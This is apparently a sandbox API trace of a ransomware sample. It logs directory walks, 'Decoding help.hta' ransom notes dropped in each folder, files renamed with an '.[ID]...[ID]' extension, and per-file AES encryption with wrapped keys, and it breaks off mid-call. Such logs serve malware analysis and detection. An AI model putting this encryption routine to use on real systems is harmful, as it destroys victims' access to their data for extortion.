1 [0057.423] CloseHandle (hObject=0x304) returned 1 [0060.505] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 637 os_tid = 0xe38 [0048.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*", lpFindFileData=0x1931fd30 | out: lpFindFileData=0x1931fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3070 [0048.929] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.929] FindNextFileW (in: hFindFile=0x5e3070, lpFindFileData=0x1931fd30 | out: lpFindFileData=0x1931fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.929] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.929] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.929] FindNextFileW (in: hFindFile=0x5e3070, lpFindFileData=0x1931fd30 | out: lpFindFileData=0x1931fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0048.930] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_x86") returned -1 [0048.930] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_x86") returned -1 [0048.930] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_x86") returned 1 [0048.932] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*" [0048.932] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*") returned 99 [0048.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0048.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0048.932] GlobalMemoryStatus (in: lpBuffer=0x1931fd10 | out: lpBuffer=0x1931fd10) [0048.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24c66508, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x428 [0048.944] CloseHandle (hObject=0x428) returned 1 [0048.944] FindNextFileW (in: hFindFile=0x5e3070, lpFindFileData=0x1931fd30 | out: lpFindFileData=0x1931fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcc07b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0048.944] FindClose (in: hFindFile=0x5e3070 | out: hFindFile=0x5e3070) returned 1 Thread: id = 638 os_tid = 0xe3c [0048.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*", lpFindFileData=0x760fd30 | out: lpFindFileData=0x760fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeefe5e10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7cd0 [0050.566] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.566] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x760fd30 | out: lpFindFileData=0x760fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeefe5e10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.566] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.567] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.567] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x760fd30 | out: lpFindFileData=0x760fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77e9d00, ftCreationTime.dwHighDateTime=0x1ca912d, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc77e9d00, ftLastWriteTime.dwHighDateTime=0x1ca912d, nFileSizeHigh=0x0, nFileSizeLow=0x43a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PortalConnect.dll", cAlternateFileName="PORTAL~1.DLL")) returned 1 [0050.567] lstrcpyW (in: lpString1=0x251ffc20, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*" [0050.567] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*") returned 72 [0050.567] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\Decoding help.hta" [0050.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\decoding help.hta")) returned 0xffffffff [0050.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x728 [0052.165] WriteFile (in: hFile=0x728, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x760fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x760fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.978] CloseHandle (hObject=0x728) returned 1 [0055.311] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.104] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PortalConnect.dll") returned -1 [0058.104] lstrlenW (lpString="PortalConnect.dll") returned 17 [0058.104] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*" [0058.104] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*") returned 72 [0058.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\", lpString2="PortalConnect.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll" [0058.104] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll" [0058.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0058.105] CreateFileMappingA (hFile=0x604, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3bc [0058.105] CryptAcquireContextA (in: phProv=0x760fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x760fcec*=0x3449a40) returned 1 [0060.177] CryptGenKey (in: hProv=0x3449a40, Algid=0x6610, dwFlags=0x1, phKey=0x760fce8 | out: phKey=0x760fce8*=0x5d8790) returned 1 [0060.177] CryptExportKey (in: hKey=0x5d8790, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x760fbe4, pdwDataLen=0x760fce4 | out: pbData=0x760fbe4*, pdwDataLen=0x760fce4*=0x2c) returned 1 [0060.177] MapViewOfFile (hFileMappingObject=0x3bc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43a0) returned 0x3940000 [0061.908] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x760fbe4*, pdwDataLen=0x760fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x760fbe4*, pdwDataLen=0x760fcf8*=0x100) returned 1 [0061.912] CryptEncrypt (in: hKey=0x5d8790, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3940000, pdwDataLen=0x760fce4*=0x43a0, dwBufLen=0x43a0 | out: pbData=0x3940000*, pdwDataLen=0x760fce4*=0x43a0) returned 1 [0061.932] UnmapViewOfFile (lpBaseAddress=0x3940000) returned 1 [0061.935] CloseHandle (hObject=0x3bc) returned 1 [0061.935] CryptDestroyKey (hKey=0x5d8790) returned 1 [0061.935] CryptReleaseContext (hProv=0x3449a40, dwFlags=0x0) returned 1 [0061.935] SetFilePointerEx (in: hFile=0x604, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.935] WriteFile (in: hFile=0x604, lpBuffer=0x760fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x760fcf8, lpOverlapped=0x0 | out: lpBuffer=0x760fbe4*, lpNumberOfBytesWritten=0x760fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.936] WriteFile (in: hFile=0x604, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x760fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x760fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.936] CloseHandle (hObject=0x604) returned 1 [0061.936] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.936] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x760fd30 | out: lpFindFileData=0x760fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77e9d00, ftCreationTime.dwHighDateTime=0x1ca912d, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc77e9d00, ftLastWriteTime.dwHighDateTime=0x1ca912d, nFileSizeHigh=0x0, nFileSizeLow=0x43a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PortalConnect.dll", cAlternateFileName="PORTAL~1.DLL")) returned 0 [0061.936] FindClose (in: hFindFile=0x5d7cd0 | out: hFindFile=0x5d7cd0) returned 1 Thread: id = 639 os_tid = 0xe40 [0048.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*", lpFindFileData=0xed0fd30 | out: lpFindFileData=0xed0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a90 [0050.604] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.604] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0xed0fd30 | out: lpFindFileData=0xed0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x522b67d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x522b67d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.604] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.604] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.604] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0xed0fd30 | out: lpFindFileData=0xed0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b285700, ftCreationTime.dwHighDateTime=0x1c9db17, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b285700, ftLastWriteTime.dwHighDateTime=0x1c9db17, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensibility.dll", cAlternateFileName="EXTENS~1.DLL")) returned 1 [0050.606] lstrcpyW (in: lpString1=0x252c7f18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*" [0050.606] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*") returned 83 [0050.606] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\Decoding help.hta" [0050.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\decoding help.hta")) returned 0xffffffff [0050.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0050.749] WriteFile (in: hFile=0x4a8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xed0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xed0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.594] CloseHandle (hObject=0x4a8) returned 1 [0052.156] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.694] lstrcmpiW (lpString1="Decoding help.hta", lpString2="extensibility.dll") returned -1 [0056.694] lstrlenW (lpString="extensibility.dll") returned 17 [0056.694] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*" [0056.694] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*.*") returned 83 [0056.694] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\", lpString2="extensibility.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll" [0056.695] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll" [0056.695] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.253] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x724 [0058.253] CreateFileMappingA (hFile=0x724, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x864 [0058.253] CryptAcquireContextA (in: phProv=0xed0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xed0fcec*=0x34490b0) returned 1 [0060.188] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0xed0fce8 | out: phKey=0xed0fce8*=0x5a58b0) returned 1 [0060.188] CryptExportKey (in: hKey=0x5a58b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xed0fbe4, pdwDataLen=0xed0fce4 | out: pbData=0xed0fbe4*, pdwDataLen=0xed0fce4*=0x2c) returned 1 [0060.188] MapViewOfFile (hFileMappingObject=0x864, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1200) returned 0x40c0000 [0063.832] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xed0fbe4*, pdwDataLen=0xed0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xed0fbe4*, pdwDataLen=0xed0fcf8*=0x100) returned 1 [0063.833] CryptEncrypt (in: hKey=0x5a58b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x40c0000, pdwDataLen=0xed0fce4*=0x1200, dwBufLen=0x1200 | out: pbData=0x40c0000*, pdwDataLen=0xed0fce4*=0x1200) returned 1 [0063.833] UnmapViewOfFile (lpBaseAddress=0x40c0000) returned 1 [0063.835] CloseHandle (hObject=0x864) returned 1 [0063.835] CryptDestroyKey (hKey=0x5a58b0) returned 1 [0063.835] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0063.835] SetFilePointerEx (in: hFile=0x724, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.835] WriteFile (in: hFile=0x724, lpBuffer=0xed0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xed0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xed0fbe4*, lpNumberOfBytesWritten=0xed0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0063.836] WriteFile (in: hFile=0x724, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xed0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xed0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0063.836] CloseHandle (hObject=0x724) returned 1 [0063.836] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0063.837] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0xed0fd30 | out: lpFindFileData=0xed0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b285700, ftCreationTime.dwHighDateTime=0x1c9db17, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b285700, ftLastWriteTime.dwHighDateTime=0x1c9db17, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensibility.dll", cAlternateFileName="EXTENS~1.DLL")) returned 0 [0063.837] FindClose (in: hFindFile=0x5d8a90 | out: hFindFile=0x5d8a90) returned 1 Thread: id = 640 os_tid = 0xe44 [0049.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G_s-w2bcxqR\\*.*", lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd10239a0, ftCreationTime.dwHighDateTime=0x1d4ccc3, ftLastAccessTime.dwLowDateTime=0xd77b78d0, ftLastAccessTime.dwHighDateTime=0x1d4d481, ftLastWriteTime.dwLowDateTime=0xd77b78d0, ftLastWriteTime.dwHighDateTime=0x1d4d481, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28b0 [0049.016] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.016] FindNextFileW (in: hFindFile=0x5e28b0, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd10239a0, ftCreationTime.dwHighDateTime=0x1d4ccc3, ftLastAccessTime.dwLowDateTime=0xd77b78d0, ftLastAccessTime.dwHighDateTime=0x1d4d481, ftLastWriteTime.dwLowDateTime=0xd77b78d0, ftLastWriteTime.dwHighDateTime=0x1d4d481, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 